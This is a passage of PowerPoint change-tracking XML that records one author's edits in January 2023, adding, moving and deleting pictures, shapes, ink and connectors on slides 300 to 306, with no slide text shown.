            <ac:spMk id="2" creationId="{5B310F6B-88B1-8C7F-BE00-58A9A6D7A427}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T03:11:09.870" v="5160" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3232421664" sldId="300"/>
            <ac:picMk id="3" creationId="{9E589F3A-EDB1-F761-5734-10DB2227B438}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T03:14:19.148" v="5165" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3232421664" sldId="300"/>
            <ac:picMk id="5" creationId="{CA4840F8-1792-D6EB-9E94-A83EA6EA7AD2}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T03:07:01.321" v="5155" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2765654876" sldId="301"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T17:23:54.814" v="6225" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2966250409" sldId="301"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T03:20:35.643" v="5173" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2966250409" sldId="301"/>
            <ac:spMk id="4" creationId="{AB09C173-AF44-231D-95D9-D9305797C730}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T03:27:43.198" v="5308" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2966250409" sldId="301"/>
            <ac:spMk id="7" creationId="{4A9A39B1-413D-217A-FB03-1848B597C663}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T03:21:18.647" v="5174" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2966250409" sldId="301"/>
            <ac:picMk id="3" creationId="{C1091FB0-B3B6-F8E1-F97D-80807D0C9DA2}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T03:22:18.901" v="5175" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2966250409" sldId="301"/>
            <ac:picMk id="6" creationId="{B1EC881F-B4F2-EBA4-F493-62AC0192A9E1}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T13:52:16.337" v="5355" actId="13822"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2966250409" sldId="301"/>
            <ac:cxnSpMk id="9" creationId="{E25B67EF-0A4C-1390-75FA-51A2AF320C38}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-07-20T14:26:52.032" v="10" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="493733997" sldId="302"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:48:50.020" v="7711" actId="2711"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3754918110" sldId="302"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:56:52.663" v="5735" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3754918110" sldId="302"/>
            <ac:spMk id="2" creationId="{2824639D-2904-4D21-F12B-5D150866B915}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T22:17:09.220" v="6555" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3754918110" sldId="302"/>
            <ac:spMk id="8" creationId="{4DD5C0CB-FEB0-33CF-7B08-4DE3E47ABB0E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:48:50.020" v="7711" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3754918110" sldId="302"/>
            <ac:spMk id="11" creationId="{F159C616-AA6E-C5BB-2803-1790B28CD5EB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T15:11:55.418" v="5909"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3754918110" sldId="302"/>
            <ac:grpSpMk id="16" creationId="{4308B76F-8C61-2724-15F3-F45F9AA2541A}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T15:12:02.816" v="5913"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3754918110" sldId="302"/>
            <ac:grpSpMk id="19" creationId="{2C90A9CB-8B1A-D1FA-086D-7A7C2B9AB102}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:58:43.343" v="5738" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3754918110" sldId="302"/>
            <ac:picMk id="4" creationId="{642D96E7-B1FA-9FBB-FFFE-D7A2F9643464}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T15:04:34.944" v="5757" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3754918110" sldId="302"/>
            <ac:picMk id="6" creationId="{9DF665EE-4B18-9DB4-5ABA-B84945294B82}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T15:04:59.699" v="5759" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3754918110" sldId="302"/>
            <ac:picMk id="10" creationId="{CB43E223-2DE3-B8D5-CD21-3AC2D589B647}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T15:11:39.098" v="5904" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3754918110" sldId="302"/>
            <ac:picMk id="13" creationId="{79A6F450-B540-ADF6-7F98-7DDD99BFA874}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T15:11:55.848" v="5910" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3754918110" sldId="302"/>
            <ac:inkMk id="14" creationId="{85D180B0-EA7D-65D4-B0F7-E925A0024ABC}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T15:11:55.418" v="5909"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3754918110" sldId="302"/>
            <ac:inkMk id="15" creationId="{819872EC-BAF8-A841-0440-CB2C886F9721}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T15:12:02.816" v="5913"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3754918110" sldId="302"/>
            <ac:inkMk id="17" creationId="{8B35699B-9AB9-FCB6-4706-0FC052425BA7}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T15:12:02.816" v="5913"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3754918110" sldId="302"/>
            <ac:inkMk id="18" creationId="{5F795760-310C-207D-B373-294184D4EC0D}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:35:45.254" v="5695" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4226038496" sldId="303"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:33:25.514" v="5681" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4226038496" sldId="303"/>
            <ac:picMk id="3" creationId="{9754B70E-5B93-3C10-DEF4-B92B094D8B6A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:34:15.048" v="5691" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4226038496" sldId="303"/>
            <ac:picMk id="5" creationId="{11D9E102-5D30-2F24-D2F1-183829A8F6E2}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:35:45.254" v="5695" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4226038496" sldId="303"/>
            <ac:cxnSpMk id="7" creationId="{8DD31AE9-964B-8879-4739-FB95E00740DE}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:35:39.780" v="5694" actId="11529"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4226038496" sldId="303"/>
            <ac:cxnSpMk id="10" creationId="{6996A405-211B-6016-6F92-8922600F6940}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:47:24.906" v="7703" actId="2711"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2997383981" sldId="304"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:46:38.765" v="5723" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2997383981" sldId="304"/>
            <ac:spMk id="20" creationId="{0A234272-EA3F-6A45-6A8D-70E862226588}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:47:24.906" v="7703" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2997383981" sldId="304"/>
            <ac:spMk id="21" creationId="{D3E65A28-8806-ECC8-C1E9-79EEB4F73087}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:45:38.537" v="5718"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2997383981" sldId="304"/>
            <ac:grpSpMk id="11" creationId="{C8694F12-BCC8-83E6-0B83-E5E4DF90CF77}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:45:23.955" v="5712"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2997383981" sldId="304"/>
            <ac:grpSpMk id="14" creationId="{7784411E-83D8-FB3B-AC7B-FC574F3690B7}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:45:38.537" v="5718"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2997383981" sldId="304"/>
            <ac:grpSpMk id="17" creationId="{D79DB386-105D-396C-4D41-3EEC211FD745}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:36:33.638" v="5698" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2997383981" sldId="304"/>
            <ac:picMk id="3" creationId="{60FE28CF-A843-83A5-1E62-645A7F1EB570}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:39:13.071" v="5700" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2997383981" sldId="304"/>
            <ac:picMk id="5" creationId="{AC291822-6E8C-3526-267E-49E020E69949}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:41:28.050" v="5701" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2997383981" sldId="304"/>
            <ac:picMk id="7" creationId="{2EC60603-5289-86FD-BD47-89EC190BE2B9}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:44:56.447" v="5703" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2997383981" sldId="304"/>
            <ac:inkMk id="8" creationId="{2DDA8A32-7786-A6AD-2AA9-C18194CD4671}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:45:38.537" v="5718"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2997383981" sldId="304"/>
            <ac:inkMk id="9" creationId="{F2B60662-3B3A-031C-4331-2CE84F03EC4B}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:45:38.537" v="5718"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2997383981" sldId="304"/>
            <ac:inkMk id="10" creationId="{9FE6DD4E-A3A8-08EC-9E4B-195749F3415B}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:45:09.488" v="5708" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2997383981" sldId="304"/>
            <ac:inkMk id="12" creationId="{FC302B54-D716-A9FC-5345-FFF8132E913C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:45:23.955" v="5712"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2997383981" sldId="304"/>
            <ac:inkMk id="13" creationId="{5293E0DD-59E1-FA1C-32D0-FFAA28CCBF61}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:45:30.951" v="5714" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2997383981" sldId="304"/>
            <ac:inkMk id="15" creationId="{DA42CD3C-C1C3-B07D-F66E-09A49C00F348}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:45:38.537" v="5718"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2997383981" sldId="304"/>
            <ac:inkMk id="16" creationId="{4833B125-1FF3-33F4-4672-1EC3346530F8}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:45:45.831" v="5719" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2997383981" sldId="304"/>
            <ac:inkMk id="18" creationId="{32F952DC-D0B7-C817-D602-18A9422EFD3E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:45:51.745" v="5721" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2997383981" sldId="304"/>
            <ac:inkMk id="19" creationId="{8C8609F4-62EF-8588-CC70-3505D2162A51}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T22:24:05.814" v="6897"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1583311198" sldId="305"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T16:02:02.684" v="6147" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1583311198" sldId="305"/>
            <ac:spMk id="5" creationId="{CAA3741F-887F-7FA9-E9C8-E2539C96AB70}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T16:04:31.228" v="6182" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1583311198" sldId="305"/>
            <ac:spMk id="8" creationId="{7B94A453-9E53-81C5-F9D3-9E395293F91B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T16:04:34.707" v="6183" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1583311198" sldId="305"/>
            <ac:spMk id="9" creationId="{F0C5114A-8669-D520-BE5F-C935B5A82942}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T22:24:05.814" v="6897"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1583311198" sldId="305"/>
            <ac:spMk id="13" creationId="{4BBDFFE8-5730-7C0F-8261-919784A1953B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T16:04:27.270" v="6181" actId="1076"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1583311198" sldId="305"/>
            <ac:grpSpMk id="12" creationId="{6D11173E-7139-BA10-0B7C-A6AB3DD00762}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T16:04:27.270" v="6181" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1583311198" sldId="305"/>
            <ac:picMk id="3" creationId="{EA3F23F4-C4F7-6216-8C54-C7F02DE9D8CA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T16:04:27.270" v="6181" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1583311198" sldId="305"/>
            <ac:picMk id="7" creationId="{A5F4AB7D-F501-4B0B-7859-0E9189B28520}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T16:04:15.073" v="6177"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1583311198" sldId="305"/>
            <ac:inkMk id="10" creationId="{20E1DF71-A5B0-E132-18C9-1CF2522B0921}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T16:04:15.073" v="6177"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1583311198" sldId="305"/>
            <ac:inkMk id="11" creationId="{23FBC670-1027-C262-E8EB-F6CC1F816832}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:58:03.121" v="7872" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="524073265" sldId="306"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
